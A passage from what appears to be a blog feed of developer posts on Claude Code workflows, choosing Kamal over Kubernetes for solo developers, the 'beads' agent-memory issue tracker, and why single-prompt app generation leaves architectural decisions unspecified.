That’s it. No fifty lines of conditionals. No edge case handling. The Explore agent figures out what to search, what to read, how deep to go. You describe the outcome. The agent handles the process.

The pattern:thin skill that spawns an agent. The skill is just a trigger with context. The agent does the thinking.

Agents vs slash commands (the actual difference)

Slash commands / Skills:

Fixed steps
Predictable output
You know exactly what will happen
Good for: formatting, templating, repetitive tasks with known structure

Agents:

Dynamic exploration
Variable output
Figures out the path autonomously
Good for: research, investigation, multi-file analysis, anything where you don’t know what you’ll find

Here’s the mental model: slash commands are for when you know the answer and just need to execute it. Agents are for when you don’t know the answer and need someone to go find it.

If you’re using slash commands for exploration, you’re making your life unnecessarily difficult. I did this for months. Learn from my suffering.

The real unlock (it’s embarrassingly simple)

Once I stopped trying to script everything, my workflow got simpler. Not more complex. Simpler.

Skills handle the predictable stuff: commit messages, content formatting, code reviews with a checklist.

Agents handle the unpredictable stuff: understanding codebases, investigating issues, researching approaches.

I stopped fighting the tool. I let agents explore. I let skills execute. Everything got easier. I felt slightly foolish for not figuring this out sooner, but that’s the tax you pay for learning things the hard way.

Next up: MCP servers — the things that let Claude actually interact with the real world instead of just imagining what websites might contain.

I help technical founders develop, deploy, and market their SaaS using Claude Code. These lessons came from months of doing it wrong first.

]]>

Claude Code Skills vs Slash Commands: Which One to Use

Lakshmi Narasimhan — Wed, 17 Dec 2025 00:00:00 +0000

This isthe most confusing distinction in Claude Code — and it only gets muddier now that skills and slash commands share the stage with subagents and plugins. Both are “reusable prompts.” Both save you from typing the same thing repeatedly. Both are shareable. Both sound like they do roughly the same job. The documentation makes them seem interchangeable, like choosing between Pepsi and Coke.

They are not interchangeable. Three differences matter:

1.Who pulls the trigger: Slash commands run when YOU invoke them. Skills run when CLAUDE decides they’re relevant.

2.Who provides context: Slash commands take arguments — /draft-linkedin-post [topic] [bullets] tells Claude exactly what to write about. Skills infer context from the conversation and codebase.

3.Token cost: Slash commands get inserted into context every time you invoke them. Skills only load their description until activated — the full content lazy-loads.

Control and clarity vs automation and efficiency. Pick your trade-off.

Slash commands: you’re in control (finally)

Slash commands run when you type them. Period. Full stop. No ambiguity. No hoping. No praying to the AI gods.

You type /draft-linkedin-post, it runs. You type /commit, it commits. Revolutionary concept, I know. In an age of magical AI that’s supposed to read your mind, there’s something deeply satisfying about a tool that just does what you tell it when you tell it.

I have /draft-linkedin-post that takes a topic and bullets, then outputs a post in my voice. Same structure every time. I don’t want Claude to get creative with the format — I want consistency. I want to type a command and get a predictable result. Like some kind of digital caveman using primitive trigger-response technology.

Other examples:

- /commit — standard commit message format

- /review — code review with my preferred checklist

- /atomize-content — break an essay into platform-specific posts

The key: if you’re giving the same instructions more than twice, make it a slash command. Your fingers will thank you. Your sanity will thank you. Your token budget might even thank you.

Skills: Claude decides (when it feels like it)

Skills are instructions that Claude is supposed to invoke automatically when relevant.

The theory — and I’m using “theory” here the same way physicists use it when they’re 90% sure but can’t prove it — is that you write a skill with a nice description, Claude reads it, and magically invokes it when the context matches.

The reality: skills don’t always fire automatically.

Sometimes Claude picks them up. Sometimes it doesn’t. Sometimes you have to explicitly say “use the X skill” anyway, which kind of defeats the entire purpose of having an “automatic” system. It’s like having a self-driving car that occasionally requires you to grab the wheel and steer. Very reassuring.

The dirty secret nobody wants to admit

Go read r/ClaudeCode threads about skills. I’ll wait. Actually, I’ll save you the trip:

“It hardly picks up any skill without actually telling it to use it”

“Skills would be awesome if it actually used them properly”

“Skills are basically just reminders to the LLM”

That last one is painfully accurate. Skills are fancy prompts that Claude may or may not remember exist. They’re like Post-It notes you stick on your monitor hoping your future self will notice them. Sometimes you do. Sometimes you walk past them for three weeks wondering why that yellow blob is in your peripheral vision.

Someone actually tested this.

Scott Spence ran 200+ tests on skill activation reliably:

The results:

- Simple instruction hook: 20% activation (coin flip)

- Forced eval hook: 84% activation

The difference? Commitment mechanisms. Instead of passively hoping Claude notices skills exist, the forced eval hook makes Claude explicitly evaluate EACH skill with YES/NO reasoning before proceeding.

Once Claude writes “YES — need this skill,” it’s committed. It’s harder to bypass something you just agreed to use.

The takeaway: skills can work reliably — but not out of the box. You needhooks to force the evaluation. Which kind of defeats the “automatic” promise.

So why do skills exist? (There are actual reasons)

Three legitimate use cases:

1. Lazy loading saves tokens.

Your CLAUDE.md is always in context. Always. Every conversation. Every token. Skills, on the other hand, are loaded on demand — at least in theory. If you have a500-line CLAUDE.md because you kept adding “just one more instruction,” consider breaking domain-specific stuff into skills.

Your wallet will appreciate this eventually.

2. Organization for the obsessive-compulsive among us.

Instead of one massive CLAUDE.md that reads like a legal document, you can have modular skills: one for frontend patterns, one for API conventions, one for content writing. It’s cleaner to maintain. It makes you feel like you have your life together. Whether Claude actually uses them correctly is a separate question.

3. Sharing your neuroses with teammates.

You can package skills and share them with your team. “Here’s how I want code reviews done” becomes a shareable artifact instead of a 47-message Slack thread that nobody will ever read.

When to use which (the practical guide for people with deadlines)

Use slash commands when:

- You want to control exactly when it runs

- The task has fixed steps

- Consistency matters more than flexibility

- You don’t trust Claude to figure out when to apply it (wise)

Use skills when:

- Instructions only apply sometimes (not every conversation)

- You want to reduce CLAUDE.md bloat

- You’re okay with Claude deciding relevance (optimistic)

- You want to share patterns across projects/teams

- You’re mentally prepared to invoke them explicitly anyway

My approach (learned through pain)

I default to slash commands. I want control. I’ve been burned too many times by “intelligent” systems that aren’t quite intelligent enough.

I use skills for domain-specific instructions that would bloat my CLAUDE.md unnecessarily. My post summarizer skill doesn’t need to be in context when I’m debugging Python. My code review preferences don’t need to load when I’m drafting blog posts.

When I create a skill, I mentally prepare to invoke it explicitly. If Claude picks it up automatically, great — I’ll take that win. If not, I type “use the X skill” and move on with my life. No frustration. No existential crisis. Just pragmatic acceptance that the future isn’t quite here yet.

This is post 2 of 4. Next up:agents — and when to stop trying to script everything like it’s 2015.

]]>

I Spent Weeks Confused About Claude Code's 5 Concepts. Here's the Mental Model That Finally Clicked.

Lakshmi Narasimhan — Thu, 11 Dec 2025 00:00:00 +0000

Slash commands, skills, agents, MCP servers, plugins. Five concepts. Five different jobs. One very confused developer (me) trying to figure out which one to use when.

You’re using Claude Code. You’ve seen these terms thrown around like confetti at a developer conference. Slash commands! Skills! Agents! MCP servers! Plugins! Each one sounds important. Each one sounds slightly different from the others. Each one makes you wonder if you’re using Claude Code wrong.

Spoiler: you probably are. But so is everyone else, so don’t feel too special about it.

Here’s the mental model that finally made sense to me after weeks of confusion and several existential crises about whether I understood my own tools.

The one-sentence version

Slash commands = shortcuts you trigger manually (like a civilized person)

Skills = instructions Claudemight trigger automatically (emphasis on “might”)

Agents = autonomous workers with their own context (little worker bees you send off to do your bidding)

MCP servers = external capabilities like browsers, databases, APIs (the things that let Claude actuallydo stuff in the real world)

Plugins = packaging that bundles any combination of the above (a zip file for your AI workflow, basically)

That’s it. Five concepts. Five different jobs. The confusion happens because they overlap like a Venn diagram designed by someone who hates clarity. A slash command can spawn an agent. An agent can use MCP servers. A plugin can contain all of the above. It’s turtles all the way down.

(I’m not coveringhooks here — automations that fire on events like file saves. That’s a whole other therapy session.)

The key distinction most people miss

Here’s what nobody tells you upfront:who decides when something runs?

Slash commands:You trigger them. Like pressing a button. Revolutionary concept.
Skills:Claude triggers them. In theory. When it feels like it. Maybe.
Agents:You spawn them, then they run autonomously until they’re done or your tokens are.
MCP servers:Claude calls them when it needs to reach outside your codebase.
Plugins:You install them. They’re just containers.

This matters more than all the technical mumbo-jumbo. Want control? Slash commands. Want Claude to figure it out? Skills. Want to let something loose and hope for the best? Agents. Want Claude to actually interact with the real world? MCP servers.

The decision tree (for people who don’t want to think about this anymore)

When you’re about to ask Claude to do something, run through this:

Is it a repeatable task with fixed steps? → Slash command. Done. Move on with your life.

Does it need to access external systems? → MCP server. Claude can’t browse the web or query databases with pure thought. Yet.

Does it require exploration and figuring things out? → Agent. Let it wander. It’s smarter than you think. Sometimes.

Is it domain-specific instructions that don’t always apply? → Skill. Good luck getting Claude to actually use it without being asked.

Do you want to share your setup with others? → Package it as a plugin. Make it someone else’s problem.

The overlap problem (or: why everyone builds three things for the same task)

Here’s what happens in the wild: developers build a slash command, a skill, AND an agent for the same task. I’ve done it. You’ve probably done it. We’ve all sinned.

Pick one primary approach:

Needcontrol over when it runs → slash command
NeedClaude to decide when it’s relevant → skill (and a prayer)
Needautonomous multi-step execution → agent
Needexternal system access → MCP server
Needto share your setup → plugin

Use the others to support, not duplicate. Your future self will thank you when you’re not debugging three different implementations of the same thing at 2 AM.

How they layer (the actually useful part)

Think of it as a stack:

Skills = instructions (how to do things)
Slash commands = triggers (entry points you control)
Agents = workers (autonomous task executors)
MCP servers = capabilities (external system access)
Plugins = packaging (bundles of all the above)

A slash command can spawn an agent. An agent can use MCP servers. A skill can teach Claude how to use an MCP server efficiently. A plugin can package all of this into something you can share on GitHub and pretend makes you a thought leader.

They compose. They don’t compete. Unless you make them compete, in which case, godspeed.

This is post 1 of 4. Next up: slash commands vs skills — and why skills don’t work the way the documentation promises they will.

I help technical founders develop, deploy, and market their SaaS using Claude Code. This is the kind of workflow clarity I wish someone had given me three months ago.

]]>

I spent years on Kubernetes. Now I'm betting against it.

Lakshmi Narasimhan — Thu, 04 Dec 2025 00:00:00 +0000

I’ve spent years in the Kubernetes ecosystem. I wrote about K3s. I ran production clusters. I know my way around kubectl, Helm charts, and the CNCF landscape.

And I’m building a deployment tool that doesn’t use any of it.

Here’s why.

Kubernetes solves problems you don’t have

K8s is incredible engineering. It solves real problems:

Multi-team deployments without stepping on each other
Automatic failover across dozens of nodes
Fine-grained resource allocation at massive scale
Rolling updates for services with thousands of instances

If you’re Spotify, you need this. If you’re running a 50-person engineering org, you need this.

If you’re a solo dev with one FastAPI app and a Celery worker? You don’t.

As one dev put it: “Do you want to build a product, or do you want to build an infrastructure team? Kubernetes makes sense for the latter, but it’s often overkill for the former.”

You need:

git push → app is live
Rollback when you break something
Logs you can actually read
Alerts when the site goes down

That’s it. Everything else is ceremony.

The hidden cost isn’t the cluster

“But K3s is lightweight! You can run it on a $6 VPS!”

True. I’ve done it. Here’s what they don’t tell you:

A solo devrecently posted on r/kubernetes with a title that said it all: “Solo dev tired of K8s churn… What are my options?”

His pain point wasn’t learning Kubernetes. It was the maintenance:

“I don’t mind learning the topics and writing the config, I do mind having to deal with a lot of work out of nowhere just because the underlying tools are beyond my control and requiring breaking updates.”

He’d been burned by Bitnami charts pulling the rug, NGINX ingress breaking changes. Things that worked stopped working — not because he changed anything, but because the ecosystem did.

“It all felt very straightforward, and it worked so well for a bit, but it starts to crumble even when I haven’t changed anything on my side.”

This is the hidden cost. Not the setup — the churn.

The YAML tax: Every change requires editing manifests. Add an env var? YAML. Change a port? YAML. Want a cron job? That’s a whole new CronJob resource. One team had a production outage caused by an improperly indented YAML line. A single space broke prod.

The debugging tax: Something’s wrong. Is it the pod? The service? The ingress? The network policy? The PVC? Hope you remember how to readkubectl describe.

The upgrade tax: K3s made this easier, but you’re still running a distributed system. A 2024 report found over 77% of Kubernetes practitioners still have issues running their clusters — up from 66% in 2022. It’s getting harder, not easier.

The cognitive tax: Part of your brain is always allocated to “how does Kubernetes work” instead of “how do I ship features.”

As one commenter put it: “Choose your churn.” There’s always something.

The Reddit OP’s conclusion? He gave up on K8s entirely. Settled on plain NixOS on a single Hetzner VPS. Accepted that 99.9% uptime from one server is good enough. Skipped the redundancy he thought he needed.

“I am trying to write my software, I just want a reliable thing to host it with the freedom and reliability that one would expect from a system that stays out of your way.”

That’s the real ask. A system that stays out of your way.

For teams, the Kubernetes tax is worth paying. You split it across people, you build expertise, you amortize the cost.

Solo? You pay it all yourself, every time.

What actually works for solo devs

So if not Kubernetes, what?

The same Reddit OP nailed the PaaS problem too:

“These ‘managed-docker’ services charge per container/pod and force the user to over-provision. Your pod doesn’t run on 250mb RAM? Ok pay for 1GB even though you only need 500mb.”

I’ve tried everything:

Heroku (great until the bill hits)
Railway/Render (same story, nicer UX — $50-100/mo for what costs $5 on a VPS)
Dokku (solid, but showing its age)
Coolify (powerful, but now you’re babysitting another server)
K3s (overkill for most solo projects)
Raw Docker + nginx (works but tedious)

The best setup I’ve found:Kamal.

It’s from 37signals. They run Basecamp and HEY on it. It’s just Docker + SSH. No cluster, no orchestrator, no YAML manifests.

kamal deploy

That’s it. It SSHs into your server, pulls your container, does a zero-downtime swap. Rollback is one command. Logs are one command.

It’s boring. It works.

My bet: AI interface > dashboards > CLI > YAML

Here’s where it gets interesting.

Kamal solved the “deploy” problem. But ops is more than deploy:

Why is the app slow right now?
What happened at 3am?
Should I upgrade my VM or optimize my code?
Show me the errors from the last hour

These questions require jumping between tools. SSH into the box, grep the logs, check Grafana, cross-reference with your deploy history.

My bet: you shouldn’t need to do any of that.

You should just ask.

“Why is memory usage spiking?” → Here’s what’s using RAM, and here’s the trend over the last week.

“Roll back to yesterday’s deploy” → Done. Here’s what changed.

“Show me errors from the /api/checkout endpoint” → Found 47 errors, here’s the pattern.

This isn’t science fiction. LLMs are good at this now. The interface just doesn’t exist yet.

What I’m building

VMKit is my attempt at this interface.

Bring your own VPS (Hetzner, DigitalOcean, whatever)
It handles Kamal, Traefik, SSL, monitoring
The interface is conversation — web chat or MCP server in Claude Code

No Kubernetes. No YAML manifests. No 47-screen dashboards.

Just say what you want.

I might be wrong. Maybe solo devs actually love clicking through Render’s UI. Maybe the Kubernetes complexity is worth it for everyone.

But I don’t think so. I think the right answer for one person running one to three apps is radically simpler than what we have today.

vmkit.dev if you want to follow along.

The uncomfortable truth

I’m not anti-Kubernetes. I’m anti-complexity-for-its-own-sake.

K8s is a tool. An incredibly powerful one. But tools have contexts where they make sense and contexts where they don’t.

Solo dev shipping a SaaS? You don’t need pod autoscaling. You need deploys that work and a way to debug when they don’t.

That’s the bet.

]]>

Why Your AI Wakes Up Every Morning With No Memory (And how to fix it)

Lakshmi Narasimhan — Tue, 11 Nov 2025 00:00:00 +0000

I was two weeks into a gnarly refactor when it happened.

Claude and I had been pair programming on an authentication system—tracking down race conditions, filing away “fix this later” issues, building up this rich context about why we made certain decisions. RS256 instead of HS256 for key rotation. Session middleware patterns. The whole architecture was in our shared understanding.

Then I hit compaction.

I came back the next day, opened a new Claude session, and asked: “Where did we leave off?”

Claude: “I don’t have information about previous sessions in my context.”

All of it. Gone.

The discovered bugs. The architectural decisions. The “by the way, we should fix this” notes. Everything we’d built up over dozens of hours—evaporated.

I spent 30 minutes re-explaining what we’d been working on. And even then, I couldn’t remember all the issues Claude had surfaced. How many edge cases had we found? Which ones were critical? What was blocking what?

This is what I call theamnesia problem. And it’s not just annoying—it’s a fundamental limitation of how we work with AI agents.

TheTODO.md Trap

So I did what everyone does: I created aTODO.md file.

## TODO
- [ ] Add rate limiting to login endpoint
- [ ] Improve password hashing
- [ ] Fix email validation
- [ ] Build dashboard (depends on auth being done)

Seemed reasonable. Every project has a TODO list, right?

Three days later, it was already a graveyard.

Half the items were done but still unchecked. A quarter were outdated. New issues Claude discovered during implementation? Lost in chat history. Dependencies? I had “(depends on auth being done)” in a parenthetical. Good luck having Claude parse that reliably after compaction.

Steve Yegge calls these “swamps of rotten half-implemented plans.” He’s right.

Here’s why markdown TODOs fail with AI agents:

They become stale instantly - You finish a task, forget to update the markdown. The agent reads it, doesn’t know what’s actually done.

No dependency tracking - Can I start the dashboard? Is auth done? The agent has to guess.

Context evaporates - “Fix email validation” tells you nothing. Which email? Where? What’s broken? Why does it matter? After compaction, this line is worthless.

Agents can’t use them reliably - Claude reads the whole list, can’t tell what’s ready to work on, and often just… ignores it.

ThatTODO.md file? After compaction, it’s all you have. And it’s not enough.

Enter Beads: A Memory System Built for Agents

That’s when I foundbeads.

Steve Yegge built it specifically to solve the amnesia problem. It’s an issue tracker, but not like Jira or Linear. It’sbuilt for AI agents, not humans.

Here’s the breakthrough:You don’t manage beads. Claude does.

I ranbd init in my project. That’s it. One command.

Then I just… kept working with Claude. And something wild happened.

Claude started filing issues automatically. Not when I asked—just when it discovered something worth remembering. While implementing the auth system, Claude would say:

“I notice there’s a potential race condition in the session handler. Filing it:

bd create ‘Fix race condition in user session’ --deps discovered-from:myapp-a4f2 -p 0“

It wasn’t asking permission. It wasn’t waiting for me to maintain a TODO list.It was building its own memory.

At the end of each session, Claude would update the notes on active issues:

bd update myapp-a4f2 --notes “COMPLETED: JWT login with RS256
KEY DECISION: Chose RS256 over HS256 for key rotation capability
IN PROGRESS: Session middleware
BLOCKERS: Need decision on token expiry (1hr vs 24hr trade-off)
NEXT: Implement refresh endpoint after expiry decision”

This wasn’t for me. This wasfor future-Claude.

The Compaction survival Test

The next day, I hit compaction again. New session, empty context.

Me: “What should we work on?”

Claude (without me asking, automatically ran these commands):

bd ready --json
bd list --status in_progress --json
bd show myapp-a4f2

Then replied:

“I can see we’re working on authentication (myapp-a4f2). Last session we completed the JWT login flow, decided to use RS256 for key rotation capability, and got blocked waiting for your decision on token expiry time.

The trade-off is: 1-hour tokens (better security, worse UX) vs 24-hour tokens (better UX, but wider attack window if tokens are compromised). What’s your preference?

Also, I’ve filed 3 issues we discovered along the way:

Rate limiting for login endpoint (P0)
Bcrypt rounds for password hashing (P1)
Race condition in session handler (P0)

Should we resolve the token expiry question first, or tackle one of the P0 issues?”

The conversation history was gone. But Claude had full context.

Every decision. Every discovered bug. Every blocker. Every trade-off. Right there.

No re-explaining. No “wait, what were we doing?” No hunting through old conversations.

This is what beads does.

TodoWrite vs Beads: Two Memory Systems

Here’s where people get confused. Claude actually hastwo memory systems, and they serve different purposes.

TodoWrite: Working Memory (This Hour)

TodoWrite is Claude’sscratch pad for the current session:

✓ [completed] Implement login endpoint
→ [in_progress] Add password hashing
[pending] Create session middleware

It shows you real-time progress. Gets marked complete as work happens.Disappears when the session ends.

Perfect for: “What’s Claude doing right now?”

Beads: Long-Term Memory (This Week/Month)

Beads is Claude’sepisodic memory across sessions:

bd show myapp-a4f2
Notes: “COMPLETED: Login with bcrypt (12 rounds)
KEY DECISION: JWT (not sessions) for stateless auth
IN PROGRESS: Session middleware
NEXT: Need input on token expiry (1hr vs 24hr)”

Survives compaction. Captures meaning, not just tasks.Persists across all sessions.

Perfect for: “What happened last week? What decisions were made?”

The Handoff Pattern

Session start: Claude reads bead notes → creates TodoWrite items for immediate work
During work: TodoWrite gets marked complete
Reach milestone: Claude updates bead notes with outcomes + context
Session end: TodoWrite disappears, bead survives with enriched notes

After compaction: TodoWrite is gone forever. Bead notes reconstruct everything.

The Magic: Dependencies That Prevent Mistakes

This is where beads gets brilliant. It supports four relationship types:

1.`blocks`- Hard Blocker

bd create “Build user dashboard” -p 1
# Created myapp-e3f7
bd create “Implement authentication” -p 0
# Created myapp-g2h9
bd dep add myapp-e3f7 myapp-g2h9
# → “myapp-g2h9 blocks myapp-e3f7”

Now dashboard won’t show inbd ready until auth is closed. Claudecan’t accidentally start building the dashboard before auth exists.

2.`discovered-from`- The Audit Trail

This is the agent’s secret weapon:

# Claude finds bug B while implementing feature A
bd create “Fix memory leak in session handler” \
--deps discovered-from:myapp-a4f2 -p 0

Creates an audit trail of how work was found. Those “oh by the way” issues Claude mentions? They now get filed permanently, linked to context.

After a week of work, you have anautomatically maintained discovery backlog. Prioritized. Linked. Ready to tackle.

3.`parent-child`- Hierarchy

bd create “Epic: Authentication system” -t epic
# Created myapp-j4k2
bd create “Add OAuth” --parent myapp-j4k2
# Created myapp-l8m1 (auto-linked)

Good for breaking down large features.

4.`related`- Soft Connection

bd dep add myapp-b7c3 myapp-d1e8 -t related
# “These touch the same code but don’t block each other”

What You Actually Do (Almost Nothing)

Your workflow:

One-time setup:

cd your-project
bd init

Done. That’s it.

Work with Claude normally:

“Let’s build user authentication”

Claude automatically:

Creates issues as work emerges
Tracks dependencies
Updates notes at milestones
Files discovered work with proper links
Checks ready work at session start

You just work. The memory management happens in the background.

When you DO interact with beads (rarely):

# Weekly review
bd stats
# Check what’s blocked
bd blocked
# Context restore after time away
bd show myapp-a4f2

The agent does the rest.

Why Claude Loves It

The most interesting thing about beads isn’t the technology. It’show Claude uses it.

Claude’s behavior changes:

1. Proactive filing: Claude files issues without being asked. “I notice X could be improved. Filing:bd create...“

2. Better planning: Claude uses dependencies to think through work order before starting.

3. Context awareness: Claude references past decisions from bead notes. “Last session we decided to use RS256 because…”

4. Discovery tracking: Claude treats discovered work as first-class, not throwaways.

Why? Because beads is built for how Claude actually works:

Structured data (JSON)
Clear state (open/in_progress/closed)
Explicit relationships (dependencies)
Queryable memory (show me what’s ready)

It’s not forcing Claude into a human workflow. It’s giving Claude the database it naturally wants.

When Beads is Overkill

Not every task needs beads. Use this test:

Use Beads when:

Work spans multiple sessions
You might hit compaction before finishing
There are dependencies or blockers
You’re discovering related work along the way
You need to resume after time away

Example: “Build authentication system” (multi-day, many parts)

Use TodoWrite when:

Work completes in this session
It’s a simple linear checklist
All context is in the conversation
No dependencies or discovery

Example: “Refactor this 200-line file” (done in an hour)

The test: “Will I need this context in 2 weeks?”

Yes → Beads
No → TodoWrite

The Git Sync: How It Works Across Machines

Beads stores everything in two places:

.beads/beads.db - Local SQLite (fast queries)
.beads/issues.jsonl - Git-versioned JSONL (syncs across machines)

On your desktop:

bd create “New issue”
# → SQLite write (instant)
# → After 5 seconds, exports to JSONL
# → Git commit with your code changes

On your laptop:

git pull
# → JSONL updates
# → bd auto-imports (newer than local DB)
# → SQLite now has the issue

You get:

Fast local operations (SQLite, <100ms)
Git versioning (full audit trail)
Multi-machine sync (JSONL)
Offline support (no server)

It’s a distributed database… that’s just files in git.

Memory as Infrastructure

We’re at this weird moment where AI coding agents are incredibly capable but also incredibly forgetful.

We expect them to remember complex multi-week projects, track dozens of discovered issues, maintain perfect context across compaction—but we give them… markdown files.

Beads doesn’t make agents smarter. It makes them less forgetful.

And honestly? That might be more important.

Because the hardest part of any project isn’t writing code. It’snot losing track of what needs to be written.

Beads gives your agent:

Memory that survives compaction
A discovery backlog that doesn’t evaporate
A dependency graph that prevents mistakes

And you barely have to do anything. Install it, initialize it, let Claude manage it.

The agent handles the rest.

Get started:

GitHub:steveyegge/beads
Quick start:bd init in your project
Let Claude do the rest

Key commands (mostly for reference—Claude uses these automatically):

bd init # One-time setup
bd ready # What’s ready? (Claude checks this)
bd show  # Issue details (Claude reads notes)
bd stats # Weekly review (you use this)
bd blocked # What’s stuck?

Give your agent a memory. See what happens.

]]>

I Watched AI Generate a Perfect Todo App in 3 Minutes. Then I Spent 3 Days Fixing It.

Lakshmi Narasimhan — Fri, 07 Nov 2025 00:00:00 +0000

Every AI coding tool demo starts the same way.

“Build me a todo app.”

Four words. Maybe ten seconds of typing. Then you sit back and watch the magic: files appear, databases materialize, endpoints generate themselves. The AI spins up authentication, adds a sleek frontend, writes tests. Three minutes later, you have a working application.

It’s impressive. It’s seductive. And for production software you’ll maintain for years, it’s a starting point at best—not a solution.

The Demo That Sells vs. The Code You Ship

I’ve spent five months deep in AI coding tools—Claude Code, claude-flow, and everything in between. I’ve watched hundreds of demos. I’ve read the marketing. And I’ve built actual production SaaS applications.

Here’s what the demos won’t tell you: that three-minute todo app works because it makes a thousand architectural decisions you never specified. And the moment your requirements diverge from those invisible assumptions, the whole thing falls apart.

Let me show you what I mean.

The Eight Decisions That Actually Matter

When you say “build me a todo app,” you think you’re giving clear instructions. But try building real production software and you’ll immediately hit these questions:

1. JWT Claims Structure

What exact fields go in your JWT payload?
Do you store roles as an array or a single string?
Where do permissions live? In the token? In the database?
Do you include user metadata or just an ID?

The demo picks one. It might not be the one you need. And changing it later? That’s not a refactor. That’s rearchitecting your entire auth system.

2. Token Rotation

15-minute access tokens with 7-day refresh tokens?
Refresh token rotation on every use?
Where do you store refresh tokens—database, Redis, or in-memory?
httpOnly cookies or localStorage?

The demo makes a choice. You won’t know what it chose until you’re debugging your third session timeout bug in production.

3. UI Library

shadcn/ui? Material-UI? Chakra? Ant Design? Headless UI?
Tailwind CSS or CSS-in-JS?
Which component patterns?

“Use a modern UI library” means nothing. I needed shadcn/ui specifically because it works with my design system, ships minimal JavaScript, and uses Tailwind. The demo gave me Material-UI. That’s not a theme change—that’s rebuilding the entire frontend.

4. Stripe Integration

Checkout flow or Payment Intents?
Subscription model or one-time payments?
Customer portal or custom UI?
Which webhooks do you handle?

The difference isn’t cosmetic. Checkout and Payment Intents are architecturally different. Choosing wrong means rewriting your entire billing integration.

5. Email Provider

SendGrid? Resend? Postmark? AWS SES?
Template system?
Transactional vs. marketing?

Each provider has different APIs, rate limits, pricing models, and deliverability characteristics. “Add email notifications” doesn’t specify any of this.

6. Database ORM

Prisma? Drizzle? TypeORM? Kysely?
Type generation approach?
Migration strategy?

Your ORM choice affects type safety, migration workflows, query performance, and deployment strategy. It’s not swappable. It’s foundational.

7. Testing Framework

Vitest? Jest? Mocha?
Supertest for integration tests?
What coverage target?

The testing framework dictates how you structure tests, handle mocks, and integrate with CI/CD. Changing it later means rewriting every test.

8. Deployment Target

Vercel? AWS? Docker compose? Railway?
What Vercel-specific features do you need?
Environment variable strategy?
Database hosting (Neon? Supabase? RDS?)?

Deployment isn’t the last step. It shapes your entire architecture—serverless vs. long-running, filesystem access, background jobs, caching strategies.

The “Just Refactor It” Myth

When I point this out, the response is always: “Just refactor what the AI generated.”

Have you actually tried this?

Swapping Prisma for Drizzle isn’t a find-and-replace operation. It means:

Rewriting your schema in a different DSL
Changing how you handle migrations
Updating every database query
Modifying your type generation
Adjusting your seeding scripts
Updating your testing setup

We’re not talking about an afternoon. We’re talking about days of work. And that’s for ONE of these eight decisions.

Change the ORM, the UI library, and the auth token structure? You’re not refactoring. You’re rebuilding.

What “Build Me an App” Actually Produces

Here’s the brutal truth: autonomous AI tools generate generic boilerplate that matches their training data’s most common patterns.

They give you:

Whatever stack is most popular on GitHub
Whatever patterns appear most in tutorials
Whatever architecture is easiest to generate

They don’t give you:

Your company’s conventions
Your infrastructure constraints
Your team’s expertise
Your product’s specific requirements

The demo works because demos don’t have requirements. Real projects die in the gap between “an app” and “our app.”

Why This Matters for Production Code

If you’re at a big company with a team of 20 engineers, maybe you can absorb the rebuild cost. You have engineering hours to burn. You have people to maintain legacy code while others refactor.

Most of us don’t have that luxury.

Whether you’re building solo, on a small team, or shipping client work, you’re living with every architectural decision for years. You can’t afford to spend three days ripping out Material-UI because an autonomous tool decided that’s what “modern UI library” meant. You can’t rebuild your auth system because the JWT structure doesn’t match your API contracts. You can’t rewrite billing integration because the tool guessed Checkout when you needed Payment Intents.

Wrong architectural decisions compound. When you’re responsible for maintaining the code—whether that’s yourself, a small team, or a client relationship—you need to understand and own those decisions.

That’s why production code requires control, not autonomy.

The Interactive Alternative

Compare that to working with Claude Code:

Me: “Add authentication to this project.”

Claude Code: “I can help with that. A few questions:

JWT or session-based auth?
If JWT, what should the token payload include?
Where should refresh tokens be stored?
What’s your refresh token rotation strategy?”

Me: “JWT. Payload should have userId, email, roles as an array, and permissions as a nested object. Refresh tokens in database with rotation on every use. 15-minute access, 7-day refresh. httpOnly cookies.”

Claude Code: “Got it. I’ll implement that exactly.”

The specification happened through dialogue. I clarified the architectural decisions before any code was written. The AI generated exactly what I specified, not what it guessed I might want.

When the auth system is running in production six months later and I need to debug a token issue, I understand every decision because I made every decision. I’m not reverse-engineering someone else’s assumptions. I’m working with my own architecture.

When Autonomy Actually Works

Autonomy isn’t wrong—it’s just context-dependent. There are places where “just handle it” is absolutely the right answer:

README generation: Standard markdown structure is fine
ESLint configuration: Default configs work for most cases
.gitignore files: Use the templates
Boilerplate CRUD endpoints: If they follow established patterns exactly
Prototypes you’ll throw away: Exploration where decisions don’t matter yet

These are low-stakes decisions with high standardization. Getting them “wrong” doesn’t cascade. You can change them later without rebuilding your application. Single-prompt generation shines here.

But authentication? Database schema? Tech stack? These are high-stakes, foundational decisions with cascading effects. This is where precision matters and guesswork fails.

The Autonomy Illusion

Here’s what the AI tool marketing doesn’t tell you:

More agents doesn’t mean better code. It means less control.

Sophisticated orchestration doesn’t mean better results. It means more complexity hiding the same specification problem.

“Just describe what you want” doesn’t work when architectural decisions require precision that natural language can’t provide.

I tested claude-flow—a sophisticated multi-agent system with 10+ agent templates, health monitoring, auto-scaling, 3-tier memory, and 60+ task types. Impressive infrastructure. But it still runs on string-based specifications. When I asked for shadcn/ui, there was no type safety, no validation, no guarantee the agent would interpret “shadcn/ui” as “shadcn/ui and absolutely nothing else.”

The specification layer is still natural language. And natural language is ambiguous.

The Real Question

The question isn’t “Can AI build an app from a single prompt?”

The answer to that is yes. Absolutely. The demos prove it.

The real question is: “Can AI build YOUR app—with YOUR architecture, YOUR conventions, YOUR constraints—from a single prompt?”

The answer to that is no.

Not because the AI isn’t capable of generating code. It’s excellent at that.

But because “build me an app” leaves a thousand architectural decisions unspecified. And every one of those decisions matters when you’re shipping production software you’ll maintain for years.

What Works Instead

After five months of research, building real projects, and testing multiple tools, here’s what actually works:

Start with control:

Make architectural decisions consciously
Specify tech stack, libraries, patterns explicitly
Use interactive tools that let you clarify requirements
Review and understand what’s being generated

Move to autonomy for execution:

Once patterns are established, autonomous tools can replicate them
Use autonomy for boilerplate that follows decided patterns
Let AI handle repetition, not decision-making

Return to control for integration:

Debugging requires understanding
Maintenance requires ownership
Evolution requires knowing why decisions were made

The cycle is: design with control, execute with autonomy, integrate with control.

Not: autonomous generation followed by days of “just refactor it.”

The Real Power of AI Coding

The promise of AI coding tools isn’t “describe an app in four words and get perfect code.”

The promise is: “Make architectural decisions at the speed of thought, then have those decisions implemented flawlessly.”

Interactive AI tools let you think at the architecture level while the AI handles the implementation level. You make decisions. The AI writes code. You maintain control and understanding. The AI handles the tedious translation from intent to syntax.

That’s the real 10x improvement.

Not “build me an app” magic that produces generic boilerplate you’ll spend days rebuilding.

